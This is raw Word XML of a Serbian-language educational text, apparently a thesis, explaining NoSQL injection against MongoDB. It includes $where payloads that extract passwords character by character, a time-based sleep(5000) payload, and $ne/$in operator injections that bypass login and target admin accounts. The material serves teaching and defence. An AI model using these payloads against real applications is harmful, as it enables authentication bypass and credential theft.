          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jednak vrednosti </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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Na ovaj način je uspešno izvršeno zaobilaženje uslova originalnog upita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000221">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8x5n4aa7oqhr" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 Otkrivanje vrednosti atributa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Osim zaobilaženja logike upita, korišćenjem spomenutih tehnika se mogu ustanoviti i vrednosti atributa. Na primer, u sledećem upitu se vrši pretraga korisnika na osnovu korisničkog imena:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">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"$where": "this.username == '&lt;unos&gt;'" }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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gde je rezultat prilikom definisanja korisničkog imena </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vidljiv na slici 34:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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4113" cy="2096261"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32"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2424113" cy="209626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34 - Regularno ponašanje upita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Otkrivanje prvog karaktera lozinke je moguće izvršiti korišćenjem payload-a kao što je:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022A">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admin' &amp;&amp; this.password[0] == 'A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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gde je rezultujući upit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022C">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"$where": "this.username == 'admin' &amp;&amp; this.password[0] == 'A'" }</w:t>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ponašanje aplikacije vidljivo na slici 35:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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7613" cy="1427170"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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3757613" cy="142717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35 - Ispitivanje vrednosti prvog karaktera lozinke</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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obzirom da nije vraćen ikakav rezultat, zaključuje se da prvi karakter nije jednak vrednosti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Ukoliko se kao payload definiše:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232">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admin' &amp;&amp; this.password[0] == 'a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">na slici 36 se može videti da je rezultat vraćen, na osnovu čega se može zaključiti da je prvi karakter lozinke korisnika </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jednak vrednosti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9981" cy="2012919"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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3759981" cy="2012919"/>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36 - Ispitivanje vrednosti prvog karaktera lozinke</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1ccpkl93gnog" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2 Time-based napadi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[13] Kao i kod klasičnih SQLi napada, moguće je izvesti i Time-based napade u slučaju Blind NoSQLi tipova napada. Ovi napadi se koriste kada namerno izazivanje grešaka ne dovodi do vidljive promene u odgovoru aplikacije, već umesto toga napadač meri vreme odgovora servera kako bi otkrio željene informacije. Posebnu opasnost predstavlja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operator jer omogućuje izvršavanje JavaScript koda pored evaluacije upita. Ovo znači da napadač može iskoristiti JavaScript funkcionalnost dostupnu u MongoDB okruženju kako bi izvršio blokirajuću operaciju, kao što je poziv funkcije koja izaziva kašnjenje, samo ukoliko je zadat uslov tačan. Primer payload-a koji demonstrira princip je sledeći:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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admin' + function(x){</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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if (x.password[0] === 'a') { sleep(5000); }</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>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}(this) + '</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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operatori imaju ulogu konkatenacije stringova.</w:t>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Kao rezultat, server će odgovoriti sa kašnjenjem samo ukoliko je prvi karakter lozinke jednak vrednosti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Praćenjem vremena odgovora aplikacije napadač može zaključiti tačnost uslova, dok se ponavljanjem payload-a za različite pozicije karaktera i vrednosti se može postupno rekonstruisati čitava lozinka, ali treba imati u vidu da uspešnost ovakvog napada može značajno zavisiti od okruženja i dostupnih funkcija. Demonstracija ovakvog napada na primeru upita spomenutog u prethodnom potpoglavlju se može videti na slici 37:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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613" cy="1657098"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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900613" cy="165709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37 - Demonstracija Time-based napada</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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gde se na osnovu izazvanog kašnjenja od </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> milisekundi može ustanoviti da je prvi karakter lozinke jednak vrednosti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2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f5mi35w8et5f" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Operator Injection</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Pored Syntax Injection napada, u cilju modifikacije logike upita je moguće izvršiti i umetanje MongoDB-specifičnih operatora kao što su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000245">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 kojim se definiše uslov za izdvajanje dokumenta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000246">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kojim se definiše nejednakost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000247">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 kojim se definiše niz mogućih vrednosti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">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$regex</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kojim se izdvajaju dokumenta čija se vrednost atributa poklapa sa definisanim </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">regex</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> izrazom</w:t>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cilju demonstracije ovakvog tipa napada će biti iskorišćena forma za prijavu korisnika koja se sastoji iz dva unosa: korisničkog imena i lozinke. Prilikom regularne prijave, upit koji bi se izvršio na primeru korisnika </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i lozinke </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user123</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bi bio sledeći:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024B">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db.users.findOne({ "username": "user1", "password": "user123" })</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Jedan od načina na koji je potencijalno moguće zaobići neophodan unos lozinke je korišćenjem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ne</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatora, na primer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024E">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db.users.findOne({ "username": "user1", "password": { "$ne": "" } })</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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slučaju se umesto stringa kao vrednost lozinke prosleđuje dokument </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "$ne": "" }</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Kao posledica će biti vraćen dokument koji se odnosi na korisnika čije je korisničko ime jednako </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i čija lozinka nije jednaka praznom stringu, čime se zaobilazi potreba za poznavanjem lozinke ukoliko se ne vrši adekvatna sanitizacija upita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Dodatno, ukoliko nije poznato korisničko ime, moguće je iskoristiti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operator za definisanje liste potencijalnih korisničkih imena, kao što je: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000251">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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db.users.findOne(</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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   </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000253">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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"username": { "$in": [ "admin", "administrator", "superadmin" ] }, </w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000254">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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"password": { "$ne": "" } </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000255">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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    }</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>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w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>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gde je rezultat vidljiv na slici 38:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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7863" cy="1485602"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33"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757863" cy="1485602"/>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38 - Korišćenje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ne</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatora</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">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 bi u slučaju navođenja </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "$ne": "" }</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dokumenta unutar polja za korisničko ime i lozinku kao rezultat bio vraćen prvi dokument koji ispunjava uslov da ni korisničko ime ni lozinka nisu jednaki praznom stringu, u ovom slučaju administratorski nalog, vidljivo na slici 39:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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76738" cy="1704403"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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4376738" cy="170440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Slika 39 - Prosleđivanje ugnježdenih dokumenata i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ne</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
